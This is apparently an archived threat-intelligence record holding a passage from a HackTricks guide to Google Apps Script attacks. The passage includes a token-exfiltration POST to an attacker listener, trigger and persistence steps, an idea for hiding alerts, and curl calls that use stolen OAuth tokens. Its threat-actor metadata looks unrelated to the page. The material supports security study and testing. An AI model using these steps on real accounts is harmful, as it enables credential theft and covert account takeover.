JSON.stringify(data),\r\n }\r\n try {\r\n UrlFetchApp.fetch(url, options)\r\n } catch (e) {\r\n Logger.log(\"Error making POST request: \" + e.toString())\r\n }\r\n}\r\nTo capture the request you can just run:\r\nngrok tcp 4444\r\nnc -lv 4444 #macOS\r\nPermissions requested to execute the App Script:\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 23 of 33\n\nWarning\r\nAs an external request is made the OAuth prompt will also ask to permission to reach external\r\nendpoints.\r\nCreate Trigger\r\nOnce the App is read, click on ⏰ Triggers to create a trigger. As function ro tun choose getToken , runs at\r\ndeployment Head , in event source select From spreadsheet and event type select On open or On edit\r\n(according to your needs) and save.\r\nNote that you can check the runs of the App Scripts in the Executions tab if you want to debug something.\r\nSharing\r\nIn order to trigger the App Script the victim needs to connect with Editor Access.\r\nTip\r\nThe token used to execute the App Script will be the one of the creator of the trigger, even if the file\r\nis opened as Editor by other users.\r\nAbusing Shared With Me documents\r\nCaution\r\nIf someone shared with you a document with App Scripts and a trigger using the Head of the App\r\nScript (not a fixed deployment), you can modify the App Script code (adding for example the steal\r\ntoken functions), access it, and the App Script will be executed with the permissions of the user that\r\nshared the document with you! (note that the owners OAuth token will have as access scopes the ones\r\ngiven when the trigger was created).\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 24 of 33\n\nA notification will be sent to the creator of the script indicating that someone modified the script\r\n(What about using gmail permissions to generate a filter to prevent the alert?)\r\nTip\r\nIf an attacker modifies the scopes of the App Script the updates won’t be applied to the document\r\nuntil a new trigger with the changes is created. Therefore, an attacker won’t be able to steal the owners\r\ncreator token with more scopes than the one he set in the trigger he created.\r\nCopying instead of sharing\r\nWhen you create a link to share a document a link similar to this one is created:\r\nhttps://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit\r\nIf you change the ending “/edit” for “/copy”, instead of accessing it google will ask you if you want to generate\r\na copy of the document:\r\nIf the user copies it an access it both the contents of the document and the App Scripts will be copied, however\r\nthe triggers are not, therefore nothing will be executed.\r\nSharing as Web Application\r\nNote that it’s also possible to share an App Script as a Web application (in the Editor of the App Script, deploy\r\nas a Web application), but an alert such as this one will appear:\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 25 of 33\n\nFollowed by the typical OAuth prompt asking for the needed permissions.\r\nTesting\r\nYou can test a gathered token to list emails with:\r\ncurl -X GET \"https://www.googleapis.com/gmail/v1/users/\u003cuser@email\u003e/messages\" \\\r\n-H \"Authorization: Bearer \u003ctoken\u003e\"\r\nList calendar of the user:\r\ncurl -H \"Authorization: Bearer $OAUTH_TOKEN\" \\\r\n -H \"Accept: application/json\" \\\r\n \"https://www.googleapis.com/calendar/v3/users/me/calendarList\"\r\nApp Script as Persistence\r\nOne option for persistence would be to create a document and add a trigger for the the getToken function and\r\nshare the document with the attacker so every-time the attacker opens the file he exfiltrates the token of the\r\nvictim.\r\nIt’s also possible to create an App Script and make it trigger every X time (like every minute, hour, day…). An\r\nattacker that has compromised credentials or a session of a victim could set an App Script time trigger and\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 26 of 33\n\nleak a very privileged OAuth token every day:\r\nJust create an App Script, go to Triggers, click on Add Trigger, and select as event source Time-driven and select\r\nthe options that better suits you:\r\nCaution\r\nThis will create a security alert email and a push message to your mobile alerting about this.\r\nShared Document Unverified Prompt Bypass\r\nMoreover, if someone shared with you a document with editor access, you can generate App Scripts inside the\r\ndocument and the OWNER (creator) of the document will be the owner of the App Script.\r\nWarning\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 27 of 33\n\nThis means, that the creator of the document will appear as creator of any App Script anyone with\r\neditor access creates inside of it.\r\nThis also means that the App Script will be trusted by the Workspace environment of the creator of\r\nthe document.\r\nCaution\r\nThis also means that if an App Script already existed and people have granted access, anyone with\r\nEditor permission on the doc can modify it and abuse that access.\r\nTo abuse this you also need people to trigger the App Script. And one neat trick if to publish the script\r\nas a web app. When the people that already granted access to the App Script access the web page, they\r\nwill trigger the App Script (this also works using \u003cimg\u003e tags).\r\nTip\r\nLearn \u0026 practice AWS Hacking:\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 28 of 33\n\nHackTricks Training AWS Red Team Expert (ARTE)\r\nLearn \u0026 practice GCP Hacking:\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 29 of 33\n\nHackTricks Training GCP Red Team Expert (GRTE)\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 30 of 33\n\nLearn \u0026 practice Az Hacking:\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 31 of 33\n\nHackTricks Training Azure Red Team Expert (AzRTE)\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 32 of 33\n\nSupport HackTricks\r\nSource: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 33 of 33",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts"
	],
	"report_names": [
		"gws-app-scripts"
	],
	"threat_actors": [
		{
			"id": "9041c438-4bc0-4863-b89c-a32bba33903c",
			"created_at": "2023-01-06T13:46:38.232751Z",
			"updated_at": "2026-04-10T02:00:02.888195Z",
			"deleted_at": null,
			"main_name": "Nitro",
			"aliases": [
				"Covert Grove"
			],
			"source_name": "MISPGALAXY:Nitro",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a2b44a04-a080-4465-973d-976ce53777de",
			"created_at": "2022-10-25T16:07:23.911791Z",
			"updated_at": "2026-04-10T02:00:04.786538Z",
			"deleted_at": null,
			"main_name": "Nitro",
			"aliases": [
				"Covert Grove",
				"Nitro"
			],
			"source_name": "ETDA:Nitro",
			"tools": [
				"AngryRebel",
				"Backdoor.Apocalipto",
				"Chymine",
				"Darkmoon",
				"Farfli",
				"Gen:Trojan.Heur.PT",
				"Gh0st RAT",
				"Ghost RAT",
				"Moudour",
				"Mydoor",
				"PCClient",
				"PCRat",
				"Poison Ivy",
				"SPIVY",
				"Spindest",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434485,
	"ts_updated_at": 1775791597,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2bc8943ba8d73c41d4563335ee8e7e1a758e911a.pdf",
		"text": "https://archive.orkl.eu/2bc8943ba8d73c41d4563335ee8e7e1a758e911a.txt",
		"img": "https://archive.orkl.eu/2bc8943ba8d73c41d4563335ee8e7e1a758e911a.jpg"
	}
}